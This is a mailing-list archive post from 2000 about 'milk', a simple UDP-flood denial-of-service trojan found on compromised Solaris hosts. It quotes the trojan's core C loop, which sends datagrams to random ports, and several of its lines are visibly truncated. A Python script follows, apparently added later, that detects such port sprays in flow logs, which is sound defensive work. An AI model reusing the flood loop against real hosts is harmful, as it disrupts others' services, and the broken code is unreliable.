Security Incidents mailing list archives
Re: [UPDATE]Dos Trojan on Solaris
From: rslau () USC EDU (Robert Lau)
Date: Wed, 9 Feb 2000 16:54:13 -0800
Please let me know if you find the source code of this "milk" or whatever name appears to be in your system. Thanks!
As David Brumley said, milk is a simple DoS. It's a *very* simple program, something anybody with socket programming experience could whip up in a few minutes. milk (along with the ttdb, cmsd, and dt holes) are quite old; we saw it on our machines last summer. Its core looks like:

    to.sin_port = htons(rand()%65000);
    if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) ==
        perror("ignoring");
        continue;
    }
    if(sendto(sock, buf, size, 0, (struct sockaddr*)(&to), sizeof(to)) ==
        perror("ignoring");
    }
    close(sock);
    }

Robert Lau
Information Services Division - Core Services
University of Southern California
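Seen from the defender's side, the loop quoted above picks a new random destination port (below 65000) for every datagram, so a compromised host stands out in flow data as one source hitting many distinct UDP ports on one destination within seconds. The following detection sketch is an added example, not part of the original post; the flow-record layout, the thresholds, the single-target assumption and all sample addresses are constructed.

```python
from collections import defaultdict

def find_udp_port_sprays(flows, window=10, min_ports=100):
    """Flag (src, dst) pairs where src sent UDP to >= min_ports distinct
    destination ports on dst inside any sliding window of `window` seconds.
    flows: iterable of (epoch_seconds, src_ip, dst_ip, proto, dst_port)."""
    by_pair = defaultdict(list)
    for ts, src, dst, proto, dport in flows:
        if proto == "udp":
            by_pair[(src, dst)].append((ts, dport))
    hits = []
    for (src, dst), events in by_pair.items():
        events.sort()
        in_window = defaultdict(int)   # port -> packets currently in window
        left = best = 0
        for ts, port in events:
            in_window[port] += 1
            # Expire events that fell out of the window ending at ts.
            while events[left][0] <= ts - window:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            best = max(best, len(in_window))
        if best >= min_ports:
            hits.append((src, dst, best))
    return sorted(hits)

def build_sample_flows():
    """Constructed sample data (assumption, not captured traffic)."""
    flows = []
    # Spray pattern: 300 datagrams in 3 s, each to a different port < 65000.
    for i in range(300):
        flows.append((1000 + i // 100, "10.0.0.5", "192.0.2.10", "udp",
                      (i * 7919) % 65000))
    # Busy but benign resolver traffic: many packets, one port.
    for i in range(500):
        flows.append((1000 + i // 10, "10.0.0.7", "10.0.0.1", "udp", 53))
    # Slow traffic to many ports, one packet every 10 s: never fills a window.
    for i in range(150):
        flows.append((1000 + 10 * i, "10.0.0.8", "192.0.2.20", "udp", 33434 + i))
    # TCP is ignored by this check.
    flows.append((1001, "10.0.0.9", "192.0.2.10", "tcp", 80))
    return flows

if __name__ == "__main__":
    for src, dst, ports in find_udp_port_sprays(build_sample_flows()):
        print(f"{src} -> {dst}: {ports} distinct UDP ports in one window")
```

Run against egress flow logs, the distinct-port count separates this pattern from high-volume single-port services such as DNS, which a plain packet-rate threshold would not.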